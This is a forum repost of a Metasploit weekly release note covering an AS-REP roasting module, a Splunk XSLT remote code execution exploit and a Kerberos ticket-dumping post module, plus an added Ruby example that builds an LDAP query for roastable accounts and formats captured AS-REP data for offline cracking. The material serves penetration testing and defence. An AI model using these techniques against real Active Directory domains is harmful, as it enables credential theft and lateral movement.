National Cyber Warfare Foundation (NCWF) Forums


Metasploit Weekly Wrap-Up: Dec. 15, 2023


2023-12-21 22:26:10
milo
Red Team (CNA)

Metasploit adds a dedicated module for AS_REP roasting and a post module for Kerberos ticket dumping.

Continuing the 12th Labor of Metasploit



Metasploit continues its Herculean task of expanding our toolset to tame Kerberos by adding support for AS-REP roasting, which retrieves crackable credential material for users whose accounts have "Do not require Kerberos preauthentication" set in Active Directory. Without pre-authentication, the KDC answers an AS-REQ for such a user with an AS-REP whose encrypted part is keyed from the user's password, so the password can be attacked offline. The setting is disabled by default, but it is enabled in some environments.


Attackers can request this material for any user with that option enabled, and worse (or better?), the setting is stored as an attribute of the account (the DONT_REQ_PREAUTH bit of userAccountControl), so an authenticated LDAP query against the DC lists exactly which users are vulnerable to the attack. Metasploit's AS-REP roasting module will both gather the users and pull the authentication material, or pull material for a selected set of users.
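The two pieces of the attack that sit around the Kerberos exchange itself, as an added example in Ruby (this is not code from the Metasploit module or from Rapid7): locating roastable accounts through the userAccountControl bits, and turning a captured AS-REP enc-part into the string an offline cracker accepts. The bit values, the LDAP bitwise-AND matching rule OID and the hashcat mode 18200 layout are Active Directory and hashcat facts; the function names, the account list and the cipher bytes are constructed for the example. The flag decoder goes slightly beyond the paragraph by also reporting TRUSTED_FOR_DELEGATION, the bit that identifies the unconstrained delegation hosts mentioned later in this post.

```ruby
# Added example (not code from the Metasploit module or from Rapid7).
# Covers the LDAP side of AS-REP roasting and the formatting of a captured
# AS-REP enc-part for an offline cracker. Function names and sample data
# below are this example's own.

# Selected userAccountControl bits as defined by Active Directory.
UAC_FLAGS = {
  0x00000002 => 'ACCOUNTDISABLE',
  0x00000200 => 'NORMAL_ACCOUNT',
  0x00080000 => 'TRUSTED_FOR_DELEGATION', # unconstrained delegation
  0x00400000 => 'DONT_REQ_PREAUTH',       # "Do not require Kerberos preauthentication"
}.freeze

ACCOUNTDISABLE   = 0x2
DONT_REQ_PREAUTH = 0x400000
# LDAP extensible-match rule: bitwise AND against an integer attribute.
LDAP_MATCHING_RULE_BIT_AND = '1.2.840.113556.1.4.803'

# Names of the flags set in a userAccountControl value.
def uac_flags(value)
  UAC_FLAGS.select { |bit, _| value & bit != 0 }.values
end

# Roastable means pre-auth is off and the account is enabled: the KDC
# rejects AS-REQs for disabled accounts (KDC_ERR_CLIENT_REVOKED), so they
# yield nothing and only add noise to the logs.
def asrep_roastable?(uac)
  (uac & DONT_REQ_PREAUTH) != 0 && (uac & ACCOUNTDISABLE) == 0
end

# LDAP filter returning enabled user accounts with pre-auth disabled.
def asrep_roastable_filter
  '(&(objectCategory=person)(objectClass=user)' \
    "(userAccountControl:#{LDAP_MATCHING_RULE_BIT_AND}:=#{DONT_REQ_PREAUTH})" \
    "(!(userAccountControl:#{LDAP_MATCHING_RULE_BIT_AND}:=#{ACCOUNTDISABLE})))"
end

# Hashcat/John representation of an AS-REP enc-part.
# For etype 23 (RC4-HMAC) the EncryptedData cipher is a 16-byte HMAC-MD5
# checksum followed by the RC4 ciphertext; hashcat mode 18200 takes
#   $krb5asrep$23$user@REALM:<checksum hex>$<ciphertext hex>
# AES etypes (17/18) use a different layout (hashcat mode 32100) and are
# deliberately not handled here.
def asrep_hash(username, realm, etype, cipher)
  raise ArgumentError, "etype #{etype} not handled in this example" unless etype == 23
  raise ArgumentError, 'enc-part too short to contain a checksum' if cipher.bytesize <= 16

  hex = cipher.unpack1('H*')
  "$krb5asrep$23$#{username}@#{realm}:#{hex[0, 32]}$#{hex[32..-1]}"
end

# Constructed sample data (not captured from a real domain).
SAMPLE_ACCOUNTS = {
  'svc_backup' => 0x400200, # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
  'old_vendor' => 0x400202, # same flags, but the account is disabled
  'jdoe'       => 0x000200, # NORMAL_ACCOUNT only
}.freeze
SAMPLE_ASREP_CIPHER = ("\x11" * 16 + "\x22" * 24).b

if __FILE__ == $PROGRAM_NAME
  puts "LDAP filter: #{asrep_roastable_filter}"
  SAMPLE_ACCOUNTS.each do |name, uac|
    state = asrep_roastable?(uac) ? 'roastable' : 'skip'
    puts "#{name.ljust(12)} 0x#{uac.to_s(16)} #{uac_flags(uac).join(',')} -> #{state}"
  end
  puts asrep_hash('svc_backup', 'CORP.LOCAL', 23, SAMPLE_ASREP_CIPHER)
end
```

The same filter, with the 0x400000 term replaced by 0x80000, is what you run to find unconstrained delegation computers and users; the disabled-account exclusion is worth keeping in both cases so the module is not pointed at accounts that can never produce a usable response.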


Ticket Management


This week's release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. The module copies every ticket that is accessible at the current privilege level (a non-elevated session sees only its own logon session's tickets; SYSTEM can reach every logon session on the host) into Metasploit's own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation from within Metasploit, and there is new documentation that outlines the entire process.


New module content (3)


Find Users Without Pre-Auth Required (ASREP-roast)


Author: smashery

Type: Auxiliary

Pull request: #18569 contributed by smashery

Path: gather/asrep


Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms for choosing targets, brute forcing from a list of usernames or an LDAP query that returns the relevant usernames, followed by requesting TGTs for each of them.


Splunk Authenticated XSLT Upload RCE


Authors: Valentin Lobstein, h00die, and nathan

Type: Exploit

Pull request: #18577 contributed by Chocapikk

Path: unix/http/splunk_xslt_authenticated_rce


Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.


Kerberos Ticket Management


Authors: Spencer McIntyre and Will Schroeder

Type: Post

Pull request: #18488 contributed by zeroSteiner

Path: windows/manage/kerberos_tickets


Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid.


Enhancements and features (3)



  • #18539 from dwelch-r7 - This adds a new session type for SMB sessions. The SMB session type is behind a feature flag and can be enabled in msfconsole with "features set smb_session_type true".

  • #18598 from bwatters-r7 - This bumps the metasploit-payloads version to bring in one fix and one enhancement. The fix standardizes the behavior of Java Meterpreter to listen only on IPv4 interfaces when binding to 0.0.0.0. The enhancement better aligns the pretty OS names reported on Windows for kernel 10.0 releases, i.e. Windows Server 2016 and later and Windows 10/11.

  • #18601 from MikeAnast - Adds arm64 support to Metasploit's Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.


Bugs fixed (4)



  • #18606 from Lorenyx - rpc_plugin has been updated to correctly use the provided plugin options.

  • #18609 from adfoster-r7 - This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.

  • #18613 from dwelch-r7 - Ensures that after listing files within an SMB directory that the handle is closed.

  • #18614 from sjanusz-r7 - Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.


Documentation


You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.


Get it


As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:


If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.




Source: Rapid7
Source Link: https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/





Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.